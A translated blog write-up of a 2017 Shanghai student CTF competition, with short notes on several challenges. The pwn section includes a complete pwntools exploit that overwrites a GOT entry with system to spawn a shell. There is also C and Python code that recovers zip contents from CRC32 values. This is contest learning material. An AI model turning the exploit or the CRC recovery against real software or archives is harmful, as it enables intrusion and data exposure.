BetaMao

The 3rd Shanghai University Student Cybersecurity Competition: Summary

2017/11/11

Some notes and reflections on the competition, written for myself~

The competition ended a week ago. I'm only writing this now because I was lying in hospital until recently. Still, this one is worth writing up: every competition I took part in over the past few months was a waste of time, and this one finally produced something.

Some Words

I didn't look at this one. I know someone dumped the table names with sqlmap; not sure whether they got all the data in the end. Watching them, I think we should write more general-purpose scripts in everyday practice; that would make things much faster.

Welcome To My Blog

A very interesting problem. Ningning said it could be solved in seconds, so I tried it too: I saw action= at the end of the URL, couldn't help appending flag, and then it was a 200~

Step By Step

robots.txt gave away the location of the source code. Downloading it, the source was encrypted. As a pay-to-win player (runs away), I searched on Baidu and paid 7.5 yuan to decrypt it. I still had 3 yuan left but forgot the account; apparently the organizers later said you didn't need to pay, but by then we had already solved it (smile cry). After decryption it was easy: brute-force the random seed, then deal with a bit of weak typing.
Okay then, here is the free script: http://sec2hack.com/web/phpjiami-decode.html

juckcode

Character-by-character brute forcing: don't forget this approach in the future (well, I didn't look at this one..)

classical

I thought it was Enigma; later a junior teammate tried base64-encoding the flag and then shifting it, which looked very similar, so that was it.
(If the offline round has no network and that frequency-analysis website isn't available, we'd be done for; that scared me into looking for an offline script.)

rrrsa

Not solved by me. I just want to say my teammates need to catch up on some techniques, otherwise we might have made it this time; they solved it one minute after the deadline~

list

I can only say my skills aren't up to scratch. I found the low-address read/write and the idea of getting a shell through atoi very early, but I couldn't find a pointer to pivot through and got stuck there. Reading the writeup reminded me that .rel entries contain pointers into the GOT. Argh!

Analysis

These three functions are what get exploited:



stringCount can go out of bounds downwards, and stringTables holds addresses, so you need an address that points at the target; that is exactly where I got stuck.

Exploitation

What I never expected: the r_offset field of the .rel.plt entries points into the GOT, so through it one address can be leaked and one address written. Get that address with readelf:

```
➜  Downloads readelf -x .rela.plt list

Hex dump of section '.rela.plt':
0x00400510 18206000 00000000 07000000 01000000 . `.............
0x00400520 00000000 00000000 20206000 00000000 ........ `.....
0x00400530 07000000 02000000 00000000 00000000 ................
0x00400540 28206000 00000000 07000000 03000000 ( `.............
0x00400550 00000000 00000000 30206000 00000000 ........0 `.....
0x00400560 07000000 04000000 00000000 00000000 ................
0x00400570 38206000 00000000 07000000 07000000 8 `.............
0x00400580 00000000 00000000 40206000 00000000 ........@ `.....
0x00400590 07000000 08000000 00000000 00000000 ................
0x004005a0 48206000 00000000 07000000 09000000 H `.............
0x004005b0 00000000 00000000 ........
```

With that, the exploit can be written:

```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *

elf = ELF('list')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

p = process('list')
atoiRelPltAddr = 0x00400588          # .rela.plt word whose value is atoi's GOT slot
stringTables = 0x000000000602080    # array of string pointers the program indexes
stringCount = 0

## Low-address read: decrement the index `count` times, then read through the pointer
def readAddr(count):
    for i in range(count):
        p.recv()
        p.sendline(b'4')
        if i % 10000 == 0:
            print(i)
    print(p.recv())
    p.sendline(b'2')
    lala = p.recv(8)
    # keep the bytes before the newline and zero-pad to 8 bytes for u64
    nl = lala.find(b'\n')
    if nl != -1:
        lala = lala[:nl]
    lala = lala.ljust(8, b'\x00')
    print(lala)
    addr = u64(lala)
    return addr

## Low-address write: decrement the index `count` times, then write through the pointer
def writeAddr(data, count):
    for i in range(count):
        p.recv()
        p.sendline(b'4')
    # gdb.attach(p)
    p.sendline(b'3')
    p.send(p64(data))

## Leak atoi's address: walk the index down to the .rela.plt entry
stringCount = (stringTables - atoiRelPltAddr) // 8 - stringCount
print(stringCount)
atoiAddr = readAddr(stringCount)
print(hex(atoiAddr))

## Compute system from the libc offset
systemAddr = atoiAddr - (libc.symbols['atoi'] - libc.symbols['system'])
print(hex(systemAddr))

## Overwrite atoi's GOT slot with system
writeAddr(systemAddr, 0)

## Trigger it: the menu input goes through atoi, which is now system
p.send(b'/bin/sh\0')
p.interactive()
```
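Where the two magic numbers in the script come from can be checked by parsing the readelf dump above as Elf64_Rela records. The following is an added example, not code from the post: the hex bytes are copied from that dump, the section start 0x400510 is its first column, and the facts that 0x602040 is atoi's GOT slot and that stringTables sits at 0x602080 are taken from the exploit script rather than verified here.

```python
#!/usr/bin/env python3
# Added example: parse `readelf -x .rela.plt` output as Elf64_Rela entries and
# locate the entry whose r_offset (the GOT slot) has a given value. The bytes
# below are copied from the dump in the post; addresses are from the script.
import struct

RELA_PLT_VADDR = 0x400510  # section start, first column of the dump
RELA_PLT_HEX = (
    "18206000 00000000 07000000 01000000"
    "00000000 00000000 20206000 00000000"
    "07000000 02000000 00000000 00000000"
    "28206000 00000000 07000000 03000000"
    "00000000 00000000 30206000 00000000"
    "07000000 04000000 00000000 00000000"
    "38206000 00000000 07000000 07000000"
    "00000000 00000000 40206000 00000000"
    "07000000 08000000 00000000 00000000"
    "48206000 00000000 07000000 09000000"
    "00000000 00000000"
)
R_X86_64_JUMP_SLOT = 7
ENTRY_SIZE = 24  # sizeof(Elf64_Rela): r_offset, r_info, r_addend


def parse_rela(hexdump, base):
    """Split the dump into records; 'at' is where each record lives in memory."""
    data = bytes.fromhex(hexdump.replace(" ", ""))
    entries = []
    for off in range(0, len(data), ENTRY_SIZE):
        r_offset, r_info, r_addend = struct.unpack("<QQq", data[off:off + ENTRY_SIZE])
        entries.append({
            "at": base + off,
            "r_offset": r_offset,          # the GOT slot the loader patches
            "sym": r_info >> 32,           # .dynsym index of the imported function
            "type": r_info & 0xFFFFFFFF,
            "addend": r_addend,
        })
    return entries


def word_holding(entries, got_slot):
    """Address of the 8-byte r_offset word whose value is got_slot, or None.
    That word is a pointer into the GOT living in read-only memory."""
    for e in entries:
        if e["r_offset"] == got_slot:
            return e["at"]
    return None


def slots_below(array_base, target_word):
    """How many 8-byte slots below array_base the target word sits, i.e. how
    many index decrements the script performs before reading through it."""
    delta = array_base - target_word
    if delta <= 0 or delta % 8:
        raise ValueError("target is not an aligned word below the array")
    return delta // 8


if __name__ == "__main__":
    entries = parse_rela(RELA_PLT_HEX, RELA_PLT_VADDR)
    for e in entries:
        print("entry @ %#x: r_offset=%#x sym=%d type=%d"
              % (e["at"], e["r_offset"], e["sym"], e["type"]))
    at = word_holding(entries, 0x602040)   # atoi's GOT slot, per the script
    print("word pointing at atoi's GOT slot lives at %#x" % at)
    print("decrements needed from stringTables:", slots_below(0x602080, at))
```

Every entry is type 7 (R_X86_64_JUMP_SLOT), so each r_offset is a lazy-binding GOT slot; the sixth entry's r_offset is 0x602040 and that word sits at 0x400588, which is the script's atoiRelPltAddr, and (0x602080 - 0x400588) / 8 = 263007 is the number of deletions the script performs. Binaries built with full RELRO and BIND_NOW keep the GOT read-only after startup, which is the mitigation that turns this write into a crash rather than a call to system.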

Result:

p200

The hint made it very obvious it was a UAF, but I chickened out when I saw C++ code. I knew this problem was simple and still didn't dare to do it, so annoying!

Boarding Pass

For this one, a note to self: pay attention to every detail given, and the website matters too; it seems only that one website could recognize it successfully!

clemency

Sigh, I knew this was the legendary middle-endian, 9-bit architecture, but I fell into a trap: I assumed the given program would read the flag.enc file at runtime and decrypt it, so I debugged it with the emulator and read through the instruction set, and still didn't get it. So frustrating! Later I read the writeup: you could do it straight from IDA.

Traffic Analysis

First time running into this kind of traffic analysis; honestly a screen full of TLS is suspicious enough. According to the writeup it goes like this:
TLS exists to encrypt data in transit, so the password can't be read from the capture alone, but the ftp-data streams carry the key for each session; importing those keys decrypts the important conversations. One of them transfers a zip; export it, it's an audio file, and the password shows up in the spectrogram of the noise at the end (or something like that). Then unzip the flag.zip obtained that way:

crc32

Not from the last competition, just something a teammate ran into today; Python was too slow, so I found a C version, tweaked it a little, and am noting it down here~

```c
#include <string.h>
#include <stdio.h>

// From: https://github.com/ETrun/crc32/blob/master/crc32.c
static unsigned long Crc32_ComputeBuf(const void *buf, size_t bufLen) {
    static const unsigned long crcTable[256] = {
        0x00000000,0x77073096,0xEE0E612C,0x990951BA,0x076DC419,0x706AF48F,0xE963A535,
        0x9E6495A3,0x0EDB8832,0x79DCB8A4,0xE0D5E91E,0x97D2D988,0x09B64C2B,0x7EB17CBD,
        0xE7B82D07,0x90BF1D91,0x1DB71064,0x6AB020F2,0xF3B97148,0x84BE41DE,0x1ADAD47D,
        0x6DDDE4EB,0xF4D4B551,0x83D385C7,0x136C9856,0x646BA8C0,0xFD62F97A,0x8A65C9EC,
        0x14015C4F,0x63066CD9,0xFA0F3D63,0x8D080DF5,0x3B6E20C8,0x4C69105E,0xD56041E4,
        0xA2677172,0x3C03E4D1,0x4B04D447,0xD20D85FD,0xA50AB56B,0x35B5A8FA,0x42B2986C,
        0xDBBBC9D6,0xACBCF940,0x32D86CE3,0x45DF5C75,0xDCD60DCF,0xABD13D59,0x26D930AC,
        0x51DE003A,0xC8D75180,0xBFD06116,0x21B4F4B5,0x56B3C423,0xCFBA9599,0xB8BDA50F,
        0x2802B89E,0x5F058808,0xC60CD9B2,0xB10BE924,0x2F6F7C87,0x58684C11,0xC1611DAB,
        0xB6662D3D,0x76DC4190,0x01DB7106,0x98D220BC,0xEFD5102A,0x71B18589,0x06B6B51F,
        0x9FBFE4A5,0xE8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0xE10E9818,0x7F6A0DBB,
        0x086D3D2D,0x91646C97,0xE6635C01,0x6B6B51F4,0x1C6C6162,0x856530D8,0xF262004E,
        0x6C0695ED,0x1B01A57B,0x8208F4C1,0xF50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA,
        0xFCB9887C,0x62DD1DDF,0x15DA2D49,0x8CD37CF3,0xFBD44C65,0x4DB26158,0x3AB551CE,
        0xA3BC0074,0xD4BB30E2,0x4ADFA541,0x3DD895D7,0xA4D1C46D,0xD3D6F4FB,0x4369E96A,
        0x346ED9FC,0xAD678846,0xDA60B8D0,0x44042D73,0x33031DE5,0xAA0A4C5F,0xDD0D7CC9,
        0x5005713C,0x270241AA,0xBE0B1010,0xC90C2086,0x5768B525,0x206F85B3,0xB966D409,
        0xCE61E49F,0x5EDEF90E,0x29D9C998,0xB0D09822,0xC7D7A8B4,0x59B33D17,0x2EB40D81,
        0xB7BD5C3B,0xC0BA6CAD,0xEDB88320,0x9ABFB3B6,0x03B6E20C,0x74B1D29A,0xEAD54739,
        0x9DD277AF,0x04DB2615,0x73DC1683,0xE3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,
        0xE40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,0xF00F9344,0x8708A3D2,0x1E01F268,
        0x6906C2FE,0xF762575D,0x806567CB,0x196C3671,0x6E6B06E7,0xFED41B76,0x89D32BE0,
        0x10DA7A5A,0x67DD4ACC,0xF9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0xD6D6A3E8,
        0xA1D1937E,0x38D8C2C4,0x4FDFF252,0xD1BB67F1,0xA6BC5767,0x3FB506DD,0x48B2364B,
        0xD80D2BDA,0xAF0A1B4C,0x36034AF6,0x41047A60,0xDF60EFC3,0xA867DF55,0x316E8EEF,
        0x4669BE79,0xCB61B38C,0xBC66831A,0x256FD2A0,0x5268E236,0xCC0C7795,0xBB0B4703,
        0x220216B9,0x5505262F,0xC5BA3BBE,0xB2BD0B28,0x2BB45A92,0x5CB36A04,0xC2D7FFA7,
        0xB5D0CF31,0x2CD99E8B,0x5BDEAE1D,0x9B64C2B0,0xEC63F226,0x756AA39C,0x026D930A,
        0x9C0906A9,0xEB0E363F,0x72076785,0x05005713,0x95BF4A82,0xE2B87A14,0x7BB12BAE,
        0x0CB61B38,0x92D28E9B,0xE5D5BE0D,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0xF1D4E242,
        0x68DDB3F8,0x1FDA836E,0x81BE16CD,0xF6B9265B,0x6FB077E1,0x18B74777,0x88085AE6,
        0xFF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0xF862AE69,0x616BFFD3,0x166CCF45,
        0xA00AE278,0xD70DD2EE,0x4E048354,0x3903B3C2,0xA7672661,0xD06016F7,0x4969474D,
        0x3E6E77DB,0xAED16A4A,0xD9D65ADC,0x40DF0B66,0x37D83BF0,0xA9BCAE53,0xDEBB9EC5,
        0x47B2CF7F,0x30B5FFE9,0xBDBDF21C,0xCABAC28A,0x53B39330,0x24B4A3A6,0xBAD03605,
        0xCDD70693,0x54DE5729,0x23D967BF,0xB3667A2E,0xC4614AB8,0x5D681B02,0x2A6F2B94,
        0xB40BBE37,0xC30C8EA1,0x5A05DF1B,0x2D02EF8D
    };
    unsigned long crc32 = 0xFFFFFFFF;
    const unsigned char *byteBuf = (const unsigned char *)buf;
    size_t i;

    for (i = 0; i < bufLen; i++) {
        crc32 = (crc32 >> 8) ^ crcTable[(crc32 ^ byteBuf[i]) & 0xFF];
    }
    return crc32 ^ 0xFFFFFFFF;
}

// Characters the chunks are assumed to be made of
static const char *charSet = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_@\n ";

int main(void) {
    // CRC32 of each 5-byte chunk, as stored in the archive's entries
    unsigned long crc32[] = { 1606238046, 1943531056, 3598719407L, 2578797435L, 1405086858, 2143805016, 3234701029L, 3224637410L,
        2346013297L, 1146766327, 4038678768L, 3119445409L, 2111148220, 383413051, 2853461348L, 3176759361L, 1852520927,
        3083243303L, 2151747034L, 1392140456, 544449252, 1871340857, 574988077, 3459049483L, 2786065872L, 3888485555L,
        1716930793, 1933746678, 3178216769L, 3774357278L, 622718466, 1488109481, 525106857, 3123386181L, 3472027048L,
        616379830, 3728848209L, 1358333123, 1852520927, 3096466191L, 622718466
    };

    char tmp[6] = "";                     // 5 candidate bytes plus the terminator
    int len = (int)strlen(charSet);
    // Walk the chunk list from the last entry to the first, brute-forcing each one
    for (int h = sizeof(crc32) / sizeof(unsigned long) - 1; h >= 0; h--) {
        for (int a = 0; a < len; a++) {
            tmp[0] = charSet[a];
            for (int b = 0; b < len; b++) {
                tmp[1] = charSet[b];
                for (int c = 0; c < len; c++) {
                    tmp[2] = charSet[c];
                    for (int d = 0; d < len; d++) {
                        tmp[3] = charSet[d];
                        for (int e = 0; e < len; e++) {
                            tmp[4] = charSet[e];
                            if (Crc32_ComputeBuf(tmp, strlen(tmp)) == crc32[h]) {
                                printf("%s", tmp);
                                //goto label; // stops at the first match; keep it commented out if collisions exist
                            }
                        }
                    }
                }
            }
        }
label:  ;
        printf("\n");
    }
    return 0;
}
```
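The C program above tries all 68^5 strings for every chunk. The same recovery can be done with 68 trials per chunk, because the last four input bytes of a CRC32 can always be chosen to steer the register to any value: fix the first character, invert the remaining four bytes, and keep only results that stay inside the charset. This is an added example, not from the post or from the crc32 repository it cites; it uses the same charset as the C code, reimplements the standard reflected CRC-32 (same values as zlib), and the chunk "pass1" is constructed for the demo. The hit list keeps every colliding candidate, which is the case the C code's commented-out goto is about.

```python
#!/usr/bin/env python3
# Added example: recover a 5-byte chunk from its CRC32 without 68**5 hashes.
# Enumerate the first character, invert the remaining four bytes (always
# possible for CRC32), and filter by charset. Same charset as the C program;
# the chunk "pass1" is constructed for the demo.

POLY = 0xEDB88320  # reflected CRC-32 polynomial (zlib/PKZIP)
CHARSET = b"1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_@\n "


def _make_table():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ POLY if c & 1 else c >> 1
        table.append(c)
    return table


TABLE = _make_table()
# Every table entry has a distinct top byte, so the top byte of the register
# after one step identifies which table index that step used.
TOP_TO_INDEX = {t >> 24: i for i, t in enumerate(TABLE)}


def crc_update(state, data):
    for b in data:
        state = (state >> 8) ^ TABLE[(state ^ b) & 0xFF]
    return state


def crc32(data):
    """Standard CRC-32, same result as zlib.crc32(data)."""
    return crc_update(0xFFFFFFFF, data) ^ 0xFFFFFFFF


def invert_four(state_before, state_after):
    """The unique 4 bytes that move the register from state_before to state_after."""
    idx = [0] * 4
    s = state_after
    for i in range(3, -1, -1):            # backwards: recover the table index of each step
        idx[i] = TOP_TO_INDEX[s >> 24]
        s = ((s ^ TABLE[idx[i]]) << 8) & 0xFFFFFFFF
    out = bytearray()
    s = state_before
    for i in range(4):                    # forwards: the byte that selects that index
        out.append((s ^ idx[i]) & 0xFF)
        s = (s >> 8) ^ TABLE[idx[i]]
    assert s == state_after
    return bytes(out)


def recover_chunk(target_crc, charset=CHARSET):
    """All 5-byte strings over charset whose CRC32 equals target_crc, collisions included."""
    final_state = target_crc ^ 0xFFFFFFFF
    hits = []
    for first in charset:
        state1 = crc_update(0xFFFFFFFF, bytes([first]))
        tail = invert_four(state1, final_state)
        if all(b in charset for b in tail):
            hits.append(bytes([first]) + tail)
    return hits


def demo():
    return recover_chunk(crc32(b"pass1"))


if __name__ == "__main__":
    print("crc32(b'hello') = %#010x" % crc32(b"hello"))
    for h in demo():
        print(h)
```

Because the four-byte inversion is exact, the search is complete: every 5-character chunk with the target CRC appears in the hit list, and a chunk is only ambiguous when a second candidate happens to fall entirely inside the charset. This is also why a 32-bit CRC in an archive is a checksum, not an integrity protection: for short plaintexts it leaks the content outright.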